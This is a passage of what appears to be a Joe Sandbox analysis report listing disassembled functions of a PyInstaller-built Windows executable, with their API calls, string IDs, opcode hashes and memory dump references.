                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                • Instruction ID: c527e9f015d1a8137d7b8471bb708c0baeddaf0fbce7987778a151b2ccdc5e3f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D31E532B09B4182EA20BB25B8542AA6695BF88798F410177EF4DD3759DF3CD50BD300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF6AAE2DF7A,?,?,?,00007FF6AAE2DC6C,?,?,?,00007FF6AAE2D869), ref: 00007FF6AAE2DD4D
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6AAE2DF7A,?,?,?,00007FF6AAE2DC6C,?,?,?,00007FF6AAE2D869), ref: 00007FF6AAE2DD5B
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF6AAE2DF7A,?,?,?,00007FF6AAE2DC6C,?,?,?,00007FF6AAE2D869), ref: 00007FF6AAE2DD85
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF6AAE2DF7A,?,?,?,00007FF6AAE2DC6C,?,?,?,00007FF6AAE2D869), ref: 00007FF6AAE2DDF3
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF6AAE2DF7A,?,?,?,00007FF6AAE2DC6C,?,?,?,00007FF6AAE2D869), ref: 00007FF6AAE2DDFF
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                • Instruction ID: ab01fe8fb67422500bc14a6dfd3580106c173d9a4663f0da61c5474ec6e03650
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E319231B1BB43D1EE51AF16A4406A52394FF48BA4F5946B7DE1EC7384EF3CE44A9210
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6AAE2351A,?,00000000,00007FF6AAE23F1B), ref: 00007FF6AAE22AA0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                • Instruction ID: 77c97a253648f932d29a8dd7d9edea64f4579d01f1f543fd76b73146513a8af7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E218332A1A78282E721AF55F4817E66394FB887C4F400176EE8D83659DF3CD64A9640
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                • Opcode ID: 955e69dbdd4f648e313349aefb080b734bae4ce698d47d394c7c697acdce6f2d
                                                                                                                                                                                                                                • Instruction ID: 47e138084e46beb8e1cdf21d2b4852166bd4296da2757b50a7aad8f7d332e1ad
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 955e69dbdd4f648e313349aefb080b734bae4ce698d47d394c7c697acdce6f2d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80215030F0F642C1F66473256651139A242BF447B0F0447B6D9BECBAE6DE2CA8436720
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                • Instruction ID: 455e124e8f7e8a89842c5f3c9b3b6ba813e8378ade3c33ba20cbe08877f766e0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F118E31B19A82C7E750AB16F85432973A8FB88BE4F004276EA5DC77A4DF3DD8168740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE28570: GetCurrentProcess.KERNEL32 ref: 00007FF6AAE28590
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE28570: OpenProcessToken.ADVAPI32 ref: 00007FF6AAE285A3
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE28570: GetTokenInformation.ADVAPI32 ref: 00007FF6AAE285C8
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE28570: GetLastError.KERNEL32 ref: 00007FF6AAE285D2
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE28570: GetTokenInformation.ADVAPI32 ref: 00007FF6AAE28612
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE28570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6AAE2862E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE28570: CloseHandle.KERNEL32 ref: 00007FF6AAE28646
                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF6AAE23C55), ref: 00007FF6AAE2916C
                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF6AAE23C55), ref: 00007FF6AAE29175
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                • Instruction ID: dc218a96754216bd24b27328b22c9433c27dde01107a4f0b4aae4a20b8bf5513
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63212F31A0A742C2FA10BF21E4153EA6265FF84780F4550B7EA4DD3796DF3DD94AA780
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6AAE34F11,?,?,?,?,00007FF6AAE3A48A,?,?,?,?,00007FF6AAE3718F), ref: 00007FF6AAE3B2D7
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6AAE34F11,?,?,?,?,00007FF6AAE3A48A,?,?,?,?,00007FF6AAE3718F), ref: 00007FF6AAE3B30D
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6AAE34F11,?,?,?,?,00007FF6AAE3A48A,?,?,?,?,00007FF6AAE3718F), ref: 00007FF6AAE3B33A
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6AAE34F11,?,?,?,?,00007FF6AAE3A48A,?,?,?,?,00007FF6AAE3718F), ref: 00007FF6AAE3B34B
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6AAE34F11,?,?,?,?,00007FF6AAE3A48A,?,?,?,?,00007FF6AAE3718F), ref: 00007FF6AAE3B35C
                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF6AAE34F11,?,?,?,?,00007FF6AAE3A48A,?,?,?,?,00007FF6AAE3718F), ref: 00007FF6AAE3B377
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                • Opcode ID: 8fefcbba4d209cc5a194374eabcf6afe7ae299e3690268f17104ea0393047aa2
                                                                                                                                                                                                                                • Instruction ID: 42150906078fdc28befde5fafd26697fbd1d2dd7e56b6d43d91a8511b5db1731
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fefcbba4d209cc5a194374eabcf6afe7ae299e3690268f17104ea0393047aa2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65115B30E0E652C2FA54B325665113DA142FF447B0F0546F6D8AFCB6E6DE6CA8436720
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6AAE21B6A), ref: 00007FF6AAE2295E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                • Instruction ID: e04d48626e88aa47e1202ca86f426e226446ad4083bcf4f3957bea9553fd0c4b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F131F832B1A68292EB10BB65A8416E76294BF887D4F414173FE8DC3755DF3CD54B9200
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                • String ID: Unhandled exception in script
                                                                                                                                                                                                                                • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                • Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                • Instruction ID: 626676d2d966986cb80795e629f624520e1cbbbfbf9fd6bd0212db4b0e884147
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B131723261AA82C9EB20EF21E8552F973A4FF88784F440176EA4E87B59DF3CD106D700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6AAE2918F,?,00007FF6AAE23C55), ref: 00007FF6AAE22BA0
                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF6AAE22C2A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                • Instruction ID: dbf007b850bb3554183459ac169899073e7ce7b152cf3cb5ab3e8383988fc905
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A721AE72B0AB4282E711AF15F8847EA73A4FB88780F404176EA8D97759DF3CD60AD740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                • Instruction ID: be319d82baabbc353829a21b169407c6efcd105f851fde120ddb16ea58398f38
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5F06271B0A706C2EB10AB24E45437A6324FF89761F540376D66EC66F4DF6DD446E310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                • Instruction ID: 26282d41002021bcf50b444ab90075c861cacd6ec76f728bdb3ccb520eebc428
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9118232E5DA0383FA643565E4953791058BF5A360E04C7B6EA6EF63DA8E6F6C437100
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF6AAE3A5A3,?,?,00000000,00007FF6AAE3A83E,?,?,?,?,?,00007FF6AAE3A7CA), ref: 00007FF6AAE3B3AF
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6AAE3A5A3,?,?,00000000,00007FF6AAE3A83E,?,?,?,?,?,00007FF6AAE3A7CA), ref: 00007FF6AAE3B3CE
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6AAE3A5A3,?,?,00000000,00007FF6AAE3A83E,?,?,?,?,?,00007FF6AAE3A7CA), ref: 00007FF6AAE3B3F6
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6AAE3A5A3,?,?,00000000,00007FF6AAE3A83E,?,?,?,?,?,00007FF6AAE3A7CA), ref: 00007FF6AAE3B407
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6AAE3A5A3,?,?,00000000,00007FF6AAE3A83E,?,?,?,?,?,00007FF6AAE3A7CA), ref: 00007FF6AAE3B418
